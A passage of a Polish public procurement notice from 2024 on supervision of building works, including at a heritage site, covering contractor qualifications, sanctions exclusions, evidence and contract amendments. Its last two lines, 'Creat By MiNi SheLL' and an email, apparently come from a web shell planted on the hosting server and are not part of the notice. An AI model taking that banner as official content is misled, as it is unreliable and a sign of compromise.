sumę gwarancyjną wynoszącą co najmniej 200.000,00zł (dwieście tysięcy złotych 00/100) Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca przedłoży dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej.<br/><br/>a.	Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej 2 usługi nadzoru inwestorskiego nad realizacją roboty budowlanej polegającej na budowie, remoncie lub przebudowie budynku wraz z zagospodarowaniem terenu, przy czym co najmniej jedna realizacja miała miejsce w obiekcie wpisanym do rejestru zabytków a realizacje wykazane jako referencyjne swoim zakresem wykonania obejmowały roboty w następujących w branżach:<br/>i.	konstrukcyjno – budowlanej – dotyczy wszystkich części zamówienia,<br/>ii.	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych – dotyczy części 1 i 4 zamówienia,<br/>iii.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – dotyczy części 2 i 4 zamówienia,<br/><br/>o wartości łącznej nadzorowanych robót nie mniejszej niż:<br/><br/>i.	2.500.000,00 zł netto (dwa miliony pięćset tysięcy złotych 00/100), przy czym wartość każdej z wykazanych robót nie może być niższa niż 1.000.000,00 zł netto – dotyczy 1 części zamówienia,<br/>ii.	300.000,00 zł netto (trzysta tysięcy złotych 00/100), przy czym wartość każdej z wykazanych robót nie może być niższa niż 150.000,00 zł netto – dotyczy 2 części zamówienia,<br/>iii.	1.300.000,00 zł netto (jeden milion trzysta tysięcy złotych 00/100), przy czym wartość każdej z wykazanych robót nie może być niższa niż 500.000,00 zł netto – dotyczy 3 części zamówienia,<br/>iv.	3.000.000,00 zł netto (trzy miliony złotych 00/100), przy czym wartość każdej z wykazanych robót nie może być niższa niż 1.500.000,00 zł netto – dotyczy 4 części zamówienia.<br/><br/>W przypadku składania ofert na więcej niż jedną część Wykonawca musi wykazać, że wykonał usługi o łącznej wartości nadzorowanych robót odpowiadającej sumie wartości nadzorowanych robót wskazanych dla poszczególnych części.<br/><br/>b.	Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami, które będą skierowane do realizacji zamówienia, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie odpowiednie do pełnionej funkcji (specjalności): <br/><br/>b1. Inspektor Nadzoru robót branży konstrukcyjno – budowlanej – osoba posiadająca:<br/>i.	uprawnienia budowlane do nadzorowania lub kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, w rozumieniu ustawy - Prawo Budowlane (Dz. U. z 2024 r., poz. 725, dalej „Prawo Budowlane”), Rozporządzenia Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie (Dz. U. z 2019 r., poz. 831) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117),<br/>ii.	uprawnienia do nadzorowania prac przy obiekcie wpisanym do rejestru zabytków – zgodnie z wymaganiami określonymi w art. 37c ustawy <br/>o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2022 r., poz. 240 <br/>z zm.), tj. „osoba, która przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury”, <br/>iii.	co najmniej 5-letnie doświadczenie na stanowisku inspektora nadzoru robót konstrukcyjno-budowlanych,<br/>iv.	doświadczenie na stanowisku inspektora nadzoru robót konstrukcyjno- budowlanych w realizacji minimum 2 usług nadzoru inwestorskiego nad realizacją robót budowlanych w obiekcie wpisanym do rejestru zabytków,<br/>	warunek b1 dotyczy wszystkich części zamówienia.<br/><br/>b2. Inspektor nadzoru robót branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych – osoba posiadająca:<br/>i.	uprawnienia budowlane do nadzorowania lub kierowania robotami budowlanymi w specjalności instalacyjnej, w zakresie sieci, instalacji <br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych bez ograniczeń w rozumieniu ustawy - Prawo Budowlane (Dz. U. z 2024 r., poz. 725, dalej „Prawo Budowlane”), Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117),<br/>ii.	co najmniej 3-letnie doświadczenie na stanowisku inspektora nadzoru robót tej branży,<br/>	warunek b2 dotyczy części 1 i 4 zamówienia.<br/><br/>b3. Inspektor nadzoru robót branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – osoba posiadająca:<br/>i.	uprawnienia budowlane do nadzorowania lub kierowania robotami budowlanymi w specjalności instalacyjnej, w zakresie sieci, instalacji <br/>i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń <br/>w rozumieniu ustawy - Prawo Budowlane (t. j. Dz. U. z 2024 r., poz. 725, dalej „Prawo Budowlane”), Rozporządzenia Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie (Dz. U. z 2019 r., poz. 831) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz. 1117),<br/>ii.	co najmniej 3-letnie doświadczenie na stanowisku inspektora nadzoru robót tej branży <br/>	warunek b3 dotyczy części 2 i 4 zamówienia.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie przez wszystkich Wykonawców lub przez co najmniej jednego z Wykonawców.<br/>Wymagane powyżej okresy doświadczenia zawodowego należy liczyć od terminu uzyskania uprawnień.<br/>Okresy doświadczenia w/w osób pokrywające się ze sobą nie będą sumowane.<br/>Zamawiający dopuszcza łączenie funkcji w/w specjalistów przez jedną osobę pod warunkiem spełnienia przez tę osobę każdego z określonych powyżej wymagań.<br/>Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane <br/>(Dz. U. z 2024 r. poz. 725) oraz ustawy z dnia 22 grudnia 2015 r. <br/>o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity Dz. U. z 2016, poz. 65 ze zm.) oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2023 r., poz. 657). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/> podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.<br/> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o<br/> szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2024 r.,<br/> poz. 507).<br/> Zamawiający informuje, że wykluczeniu z postępowania na podstawie pkt 7.6 SWZ podlegają Wykonawcy:<br/> 1) wymienieni w wykazach określonych w rozporządzeniu 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w<br/> związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn.<br/> zm.) i rozporządzeniu 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań<br/> podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014,<br/> str. 6, z późn. zm.) albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o<br/> którym mowa w art. 1 pkt 3 powołanej ustawy;<br/> 2) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/> finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593, 655, 835, 2180, 2185, z 2023 r. poz. 180, 326) jest osoba wymieniona w<br/> wykazach określonych w rozporządzeniu 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z<br/> sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.) i<br/> rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została<br/> wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3<br/> powołanej ustawy;<br/> 2024-08-14 Biuletyn Zamówień Publicznych<br/> Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Ogłoszenie nr 2024/BZP 00459180/01 z dnia 2024-08-14<br/> 3) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023<br/> r. poz. 120, 295, 1598, z 2024 r. poz. 619) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 z dnia 18<br/> maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec<br/> Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.) i rozporządzeniu 269/2014 z dnia 17 marca 2014 r. w sprawie środków<br/> ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im<br/> zagrażających (Dz. Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.) lub będący taką jednostką dominującą od dnia 24 lutego 2022 r.,<br/> o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/> art. 1 pkt 3 powołanej ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r., poz. 594), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>2)	wykaz osób skierowanych przez Wykonawcę do realizacji Zamówienia, <br/>w szczególności odpowiedzialnych za świadczenie usług, o których mowa <br/>w Rozdziale VII ust. 2 pkt 4 lit. b) – SWZ, sporządzony na Załączniku Nr 5 do SWZ, zawierający informacje na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>3)	sporządzony na Załączniku Nr 6 do SWZ wykaz usług, szczegółowo wskazanych <br/>w Rozdziale VII ust. 2 pkt 4 lit. a) SWZ, wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, <br/>a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>4)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony <br/>od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 200.000,00 zł (dwieście tysięcy złotych 00/100).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane, pod rygorem nieważności, jedynie w formie pisemnych aneksów podpisanych przez obie stronny.<br/>2.	Dopuszcza się zmiany umowy, jeżeli zachodzi co najmniej jedna z okoliczności, o których mowa w art. 455 Pzp.<br/>3.	Zamawiający przewiduje możliwość dokonania następujących zmian umowy:<br/>1)	zmiany terminu wykonania przedmiotu Umowy polegającą na czasowym wstrzymaniu jej wykonywania na czas, w którym niemożliwe będzie realizowanie przedmiotu Umowy i odpowiednie przedłużenie o czas wstrzymania w następujących przypadkach:<br/>a.	przyczyn wyłącznie zależnych od Zamawiającego,<br/>b.	siły wyższej rozumianej jako zdarzenie zewnętrzne wpływające na możliwość należytego wykonania umowy, nie dające się przewidzieć, którego skutkom nie można było zapobiec, nawet przy dołożeniu najwyższej staranności, w szczególności ewentualne okoliczności związane z ogłoszeniem na obszarze Rzeczypospolitej Polskiej stanu epidemii lub stanu wyjątkowego,<br/>2)	zmiany terminu rozpoczęcia i zakończenia realizacji przedmiotu Umowy w przypadku zmiany terminów realizacji Zadania inwestycyjnego, o którym mowa w §1 ust. 1 Umowy,<br/>3)	zmiany osób wskazanych w §12 ust. 3 Umowy na warunkach określonych w §12 ust. 5 -7 Umowy,<br/>4)	zmiany rachunku bankowego na zasadach określonych w §5 ust. 9 Umowy.<br/>4.	Ponadto, stosownie do treści art. 436 pkt 4 lit b Ustawy p.z.p., Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia określonego w §5 ust. 1 Umowy w następujących przypadkach:<br/>a.	w przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b.	w przypadku zmiany wysokości minimalnego wynagrodzenia za pracy albo wysokości minimalnej stawki godzinowej ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracy (t.j. Dz.U. z 2020 roku poz. 2207)<br/>c.	w przypadku zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub zmiany wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>d.	w przypadku zmian zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 roku o pracowniczych planach kapitałowych (t.j. Dz. U. z 2020 roku poz. 1342 z późn. zm.),<br/>jeżeli zmiany określone w pkt. a-d będą miały wpływ na koszty wykonania Umowy przez Wykonawcę.<br/>5.	W sytuacji wystąpienia okoliczności wskazanych w ust. 4 pkt a. niniejszego paragrafu Wykonawca jest uprawniony złożyć Zamawiającemu pisemny wniosek o zmianę Umowy w odniesieniu do płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawki podatku od towarów i usług albo podatku akcyzowego. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych zmiany stawki podatku od towarów i usług albo podatku akcyzowego oraz dokładne wyliczenie kwoty wynagrodzenia należnego wykonawcy po zmianie Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> [dokończenie informacji RODO]<br/>10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>[dokończenie zmian umowy]<br/>7.	W sytuacji wystąpienia okoliczności wskazanych w ust. 4 pkt c niniejszego paragrafu Wykonawca jest uprawniony złożyć Zamawiającemu pisemny wniosek o zmianę Umowy w odniesieniu do płatności wynikających z faktur wystawionych po zmianie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokość składki na ubezpieczenia społeczne lub zdrowotne. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy. W szczególności Wykonawca zobowiązuje się wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia, a zmianą zasad, o których mowa w ust. 4 pkt c niniejszego paragrafu. W tym celu Wykonawca przedstawi odpowiednie oświadczenia i dokumenty uprawdopodobniające wpływ zmiany przepisów prawa na poziom wynagrodzenia dla pracowników wykonujących prace związane z realizacją Umowy. Wniosek może obejmować jedynie dodatkowe koszty realizacji Umowy, które Wykonawca obowiązkowo ponosi w związku ze zmianą zasad, o których mowa w ust. 4 pkt c niniejszego paragrafu.<br/>8.	W sytuacji wystąpienia okoliczności wskazanych w ust. 4 pkt d niniejszego paragrafu Wykonawca jest uprawniony złożyć Zamawiającemu pisemny wniosek o zmianę Umowy w odniesieniu do płatności wynikających z faktur wystawionych po zmianie zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy, w szczególności Wykonawca zobowiązuje się wykazać związek pomiędzy wnioskowaną, kwotą podwyższenia wynagrodzenia, a wpływem zmiany zasad, o których mowa w ust. 4 pkt d niniejszego paragrafu. Wniosek możne obejmować jedynie dodatkowe koszty realizacji umowy, które Wykonawca obowiązkowo ponosi w związku ze zmianą zasad, o których mowa w ust. 4 pkt d niniejszego paragrafu.<br/>9.	Obowiązek wykazania wpływu zmian, o których mowa w ust. 4 niniejszego paragrafu na zmiany wynagrodzenia, o którym mowa w §5 ust. 1 Umowy należy do Wykonawcy pod rygorem odmowy dokonania zmiany Umowy przez Zamawiającego.<br/>10.	Zmiana umowy w zakresie zmiany wynagrodzenia z przyczyn określonych w niniejszym paragrafie obejmować będzie wyłącznie płatności za usługi, których w dniu zawarcia umowy jeszcze nie wykonano.<br/>11.	Zmiana umowy nastąpić może z inicjatywy każdej ze Stron.<br/>12.	W przypadku konieczności wprowadzenia zmian do umowy Strona zainteresowana przekazuje drugiej Stronie wniosek sporządzony na piśmie pod rygorem nieważności.<br/>13.	Wniosek o dokonanie zmiany umowy powinien zawierać opis zdarzenia lub okoliczności stanowiących podstawę do żądania zmiany. <br/>14.	Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem wszelkich dokumentów wymaganych Umową i informacji uzasadniających żądanie zmiany umowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.<br/>15.	Wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu do Umowy, pod rygorem nieważności.<br/>16.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy i nie wymagają zachowania formy, o której mowa w ustępie poprzedzającym, następujące zmiany: <br/>- danych teleadresowych, <br/>- danych rejestrowych. <br/>O zmianie tych danych każda ze stron zobowiązana jest informować drugą stronę umowy w formie pisemnej niezwłocznie po wystąpieniu zmiany.

Creat By MiNi SheLL
Email: jattceo@gmail.com